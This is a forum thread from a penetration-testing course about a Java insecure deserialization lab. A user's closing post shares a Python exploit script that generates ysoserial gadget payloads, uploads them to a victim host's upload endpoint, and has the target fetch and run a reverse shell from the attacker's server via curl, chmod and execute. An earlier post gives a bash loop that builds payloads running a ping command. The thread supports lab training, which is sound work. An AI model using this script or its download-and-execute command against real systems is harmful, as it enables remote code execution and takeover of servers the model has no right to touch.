Is there any Video solution available for "Java Insecure Deserialization - Scenario 1" lab for eWPTXv2 course?

I’m looking for video solution or tutorial for “Java Insecure Deserialization - Scenario 1” lab.

-Thanks.

We don’t have video solutions for labs. But there are solutions in each lab. I’m looking at your conversation with Andres. It looks like you’re missing steps.

Check your file permissions for the payloads in Downloads. Were you able to confirm the payload with tcpdump?

@jmason-joshua17sc
Thanks for the assistance!
Actually, I’m facing a problem while creating the ysoserial payloads as the individual filenames.

while read payloadname; do java -jar ../java/ysoserial-master-SNAPSHOT.jar $payloadname "ping 172.16.64.3 -c 3" > $payloadname; done < payloads.txt

When using the above command, it is supposed to create ysoserial payloads as individual files. (In the above command, I changed the IP and ysoserial path according to my system)
But in this case, I’m facing an error. (Appended the screenshot below)

Ysoserial-payload-error1920×1096 232 KB

And I think this is the error, once if it’s solved I can complete this lab.

Thanks.

It looks like it might be your version of java or your permissions.
I haven’t seen this error before.

To fix the problem you have, adding the --illegal-access=warn was sufficient for me.

Anyway, my in-progress exploit code (with minor python3 improvements) can be seen below. The reverse shell isn’t working for me (and I have no idea why), but at least you can see requests coming at the python HTTP server. I hope it helps people.

import os

import requests
import time
import threading
from datetime import datetime

victimIP = "172.16.64.23"
myIP = "INSERT-YOUR-IP"


def readfile():
    url = f"http://{victimIP}/upload/index.php?sent=OK"
    r = requests.get(url)
    print(r.text)
    print("\n")


def upload(filename):
    now = datetime.now()
    print(f"[+] Used filename: {filename} at timestamp {now.strftime('%H:%M:%S')}")
    url = f"http://{victimIP}/upload/upload.php"
    filepath = f'payloads/{filename}.txt'
    files = {'uploaded_file': open(filepath, 'rb')}
    r = requests.post(url, files=files)


payloads = [
    # 'Spring2',
    # 'JRMPClient',
    # 'CommonsCollections3',
    'CommonsCollections2',
    # 'ObjectPayload',
    # 'MozillaRhino2',
    # 'BeanShell1',
    # 'Myfaces1',
    # 'DynamicDependencies',
    # 'CommonsCollections5',
    # 'AspectJWeaver',
    # 'JRMPListener',
    # 'Hibernate2',
    # 'JBossInterceptors1',
    # 'Groovy1',
    # 'Click1',
    # 'Jdk7u21',
    # 'Jython1',
    # 'JavassistWeld1',
    # 'CommonsCollections4',
    # 'C3P0',
    # 'CommonsCollections7',
    # 'JSON1',
    # 'ROME',
    # 'Wicket1',
    # 'FileUpload1',
    # 'Hibernate1',
    # 'Vaadin1',
    # 'Myfaces2',
    # 'CommonsCollections6',
    # 'Clojure',
    # 'CommonsBeanutils1',
    # 'CommonsCollections1',
    # 'MozillaRhino1',
    # 'URLDNS',
    # 'ReleaseableObjectPayload',
    # 'Spring1',
]

command = f"curl http://{myIP}:8443/rev.py -O rev.py && chmod +x rev.py && ./rev.py"

for payload in payloads:
    os.system(f"java -jar --illegal-access=warn ysoserial.jar {payload} \"{command}\" > {payload}.txt")
    x = threading.Thread(target=upload, args=(payload,))
    x.start()
    readfile()
    time.sleep(2)